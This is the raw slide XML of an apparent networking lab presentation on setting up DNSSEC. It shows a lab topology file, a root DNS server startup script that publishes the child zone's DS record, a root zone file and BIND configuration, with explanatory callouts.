                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[3]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[1]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot2[0]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot2[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsroot2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8486D852-01F0-3AC3-9A19-10E061848E34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</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26282171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EFD25-987A-CE6C-1267-5AC91AF39B0D}"/>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7B5BC90B-929D-421D-776B-4A99A378BD46}"/>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03296E4A-889F-CD90-350E-61FD68E7AA90}"/>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662B3FBA-FCC6-D548-5BE9-B63911BC7C8F}"/>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5ECB3F56-D8F4-1B4D-70CA-9E1B427C2E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1B426A-B777-D756-6709-42509CD38D85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="69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marL="285750" indent="-285750" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" noProof="0"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dnsuni2[0]="G"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2[image]="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/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc4[2]="H"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[0]="H"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[image]="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/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r3[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>w</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ireshark</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[bridged]=true</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lscr.io</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linuxserver</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/wireshark"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[port]="3000:3000"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>wireshark[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>num_terms</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]=0</a:t>
              </a:r>
            </a:p>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13322" name="AutoShape 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4C91164-E86E-868B-0775-F66415646EC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2491" y="3333"/>
              <a:ext cx="622"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err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lab.conf</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37068028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AF8A3-62F9-FB5C-6EB5-3069ABCE802F}"/>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9A8A2AD9-00D0-EA31-F1B0-6EC77B8F3D76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1314750"/>
            <a:ext cx="11159820" cy="4938154"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="9028" cy="1739"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8219057E-F0BE-3B8B-7522-04472FE593AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="9028" cy="1681"/>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10.0.3.5/24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110.0.0.0/24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210.0.3.0/24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100.0.75.0/24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200.1.1.0/24 via 10.0.3.2</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195.0.10.0/24 via 10.0.3.2</a:t>
              </a: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/var/cache/bind/keys</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/var/cache/bind</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775 /var/cache/bind</a:t>
              </a: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  while ! dig @10.0.3.10 it DNSKEY | grep -q "257 3 13"; do sleep 2; done</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  echo "" &gt;&gt;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dig @10.0.3.10 it DNSKEY | </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnssec-dsfromkey</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -f - it &gt;&gt;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sed -</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 's/2024120401/2024120402/'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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rndc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> reload .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>) &amp;</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E3953DA1-4D2D-0029-B14D-4EA717D92D74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2705" cy="143"/>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nsroot.startup</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BECD97DC-C346-7FD1-9225-72E62A2A7D38}"/>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1BCA40BF-D897-B4B8-1554-BCF24FCA05AB}"/>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0970D5B1-A6F4-6A6F-BA5D-44AA2D5DEEBA}"/>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5" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9804E6-E8B8-18F8-5A3C-124B1781CE9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8217099" y="2858984"/>
            <a:ext cx="3830316" cy="917369"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -58873"/>
              <a:gd name="adj2" fmla="val 14579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queries the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dnsit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> server (10.0.3.10) asking for its public keys (DNSKEY) for the it zone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE50A43-950E-A99A-1DA8-11D86C544FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6825960" y="5155887"/>
            <a:ext cx="3830316" cy="627396"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -112509"/>
              <a:gd name="adj2" fmla="val -63714"/>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adds a blank line to the end of the root zone file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30498217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108AF-61F6-0D0C-30E5-2AE714DBAA23}"/>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E696BB71-4A4E-EF9D-24AF-526144204442}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="2033534"/>
            <a:ext cx="7641005" cy="2790932"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="889"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03CE7F58-964C-8BFD-00B7-53506A27C0A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="831"/>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$TTL 60000</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@       IN      SOA     ROOT-SERVER.    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root.ROOT</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-SERVER. (</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                        2024120401 28800 14400 3600000 0 )</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>@               IN      NS      ROOT-SERVER-2.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.    IN      A       10.0.3.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER-2.  IN      A       100.0.75.5</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>it.             IN      NS      dnsit.it.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsit.it.       IN      A       10.0.3.10</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DE746CF2-5E62-F545-CE7D-D87D971528A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="2712" cy="13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nsroot</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7AED43B1-4E5A-2903-1457-5442CCE0EBBA}"/>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CAEADF54-A0E6-5B9B-9659-494B5E418720}"/>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51DE66FA-25DC-2B35-A37D-991E966B793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31933484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16668-DB80-7409-7FEB-F3E73CBE4F8F}"/>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3D935351-E764-7A23-765D-C83C21A115E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2275497" y="1814065"/>
            <a:ext cx="7641005" cy="3205608"/>
            <a:chOff x="126" y="3285"/>
            <a:chExt cx="5943" cy="1189"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184E2B51-A5E0-0DCA-A553-3B03FE5A69B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="112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include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named.conf.options</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zone "."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 master;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file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db.root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dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>-policy default;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inline-signing</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
